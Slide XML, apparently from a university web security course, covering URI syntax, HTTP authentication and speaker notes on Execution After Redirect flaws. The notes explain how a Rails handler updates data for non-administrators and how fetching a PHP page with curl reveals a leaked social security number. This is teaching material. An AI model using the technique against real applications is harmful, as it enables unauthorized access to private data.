          <a:bodyPr wrap="none" lIns="91426" tIns="45714" rIns="91426" bIns="45714" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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E40D2-84D9-314F-B73E-D37E60F7C2FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594946" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143001" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91433" tIns="45717" rIns="91433" bIns="45717" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594947" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5021263" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91426" tIns="45714" rIns="91426" bIns="45714" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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88DF70-1F10-EA40-B9ED-A6DE8DF89852}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596994" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143001" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91433" tIns="45717" rIns="91433" bIns="45717" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596995" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5021263" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91426" tIns="45714" rIns="91426" bIns="45714" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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893377-2414-D34C-A600-FFD252D57966}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59904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99043"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3190DA-5EEC-DD4E-8104-50D328B6BF8F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>157</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B728D5-60F8-234E-B295-D8EED1AFE1D6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113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558802-B897-474C-9366-7AF9DD29DA0F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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CF4A7-F5E5-C946-953D-7AB1E77E136C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817154"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17155"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46D458-934A-5B45-B2B0-F9D6091A0E4C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161218"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116121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C57966-7A30-1B43-B58A-81B74398DED6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163266"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116326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A9F5F4-E525-D14B-8B7E-21CBE8D00731}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170434"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117043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here talk about redirect having a body.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198615703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Ruby on Rails EAR that was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> adapted from a vulnerability I discovered in the wild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we can see that the topic is first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> found by its id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Then, if the current user is not an administrator, they are redirected to ‘slash,’ or root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Next, the topic is updated with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from the user. This updates the topic in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>a notice is set to the user that the topic was updated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The vulnerability here is that the topic will be updated even if the current user is not an administrator!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Connect back to checking with browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr/>
              <a:t>192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182596031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no one thought of it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> or categorized it as a vulnerability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276395283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EAR’s can be of two different types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> EARs are when code is executed after a redirect, but the code doesn’t change the state of the web application or leak sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>A vulnerable EAR is when that happens, an unauthorized data modification occurs or the application discloses sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>We’ve already seen an example of a database-modification vulnerable EAR, now lets look at an information leakage EAR.</a:t>
            </a:r>
          </a:p>
          <a:p>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194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378611286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PHP example follows a similar format. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>If the current user is not an administrator, they are redirected to the root page (using PHP’s header function).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Finally, a social security number is sent in the output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>If you access this page using a web browser, you won’t see anything, you’ll be immediately redirected to the root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>However, if you use curl, you’ll see the SSN in the output!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Now, you might say, well this is easy to fix, either terminate the process (with exit in PHP) or return from the method.</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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212462458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91C0A5-B148-F444-A5A1-29A4260DE79C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>201</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0095969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8B0EB8-2C0E-0048-AB23-97E32F3D5611}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>202</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3312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9604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3053664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49"/>
            <a:ext cx="4038600" cy="37117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49"/>
            <a:ext cx="4038600" cy="37117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252319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213355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1256020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0"/>
            <a:ext cx="8229600" cy="375389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9400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xStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1900" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1400" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="»"/>
        <a:defRPr sz="1200" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Robot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hyperlink" Target="https://github.com/OWASP/CheatSheetSeries/" TargetMode="Externa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Web Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Giovanni Vigna</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UCSB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fall 2024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5144854B-D776-BF27-1CA6-0ADCC1682251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1539551" y="253792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495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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>URI Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The general URI syntax is specified in RFC 3986</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Specific types of URIs are described in separate standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Syntax: &lt;scheme&gt;://&lt;authority&gt;&lt;path&gt;?&lt;query&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ftp://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ftp.ietf.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rfc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/rfc1808.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>www.cs.ucsb.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>jdoe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/My%20HomePage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>mailto:cs176b@cs.csb.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>telnet://melvyl.ucop.edu/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:+1-800-123-4567</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156828582"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which Is The Best Way to Authenticate?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="924675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something you know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something you have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something you are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP-based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form-based authentication over TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Single-Sign On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication establishment and reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30996006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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>HTTP Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Based on a simple challenge-response scheme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The challenge is returned by the server as part of a 401 (unauthorized) reply message and specifies the authentication schema to be used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>An authentication request refers to a realm, that is, a set of resources on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The client must include an Authorization header field with the required (valid) credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3010944007"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>HTTP Basic Authentication Scheme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The server replies to an unauthorized request with a 401 message containing the header field</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>WWW-Authenticate: Basic realm=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ReservedDocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
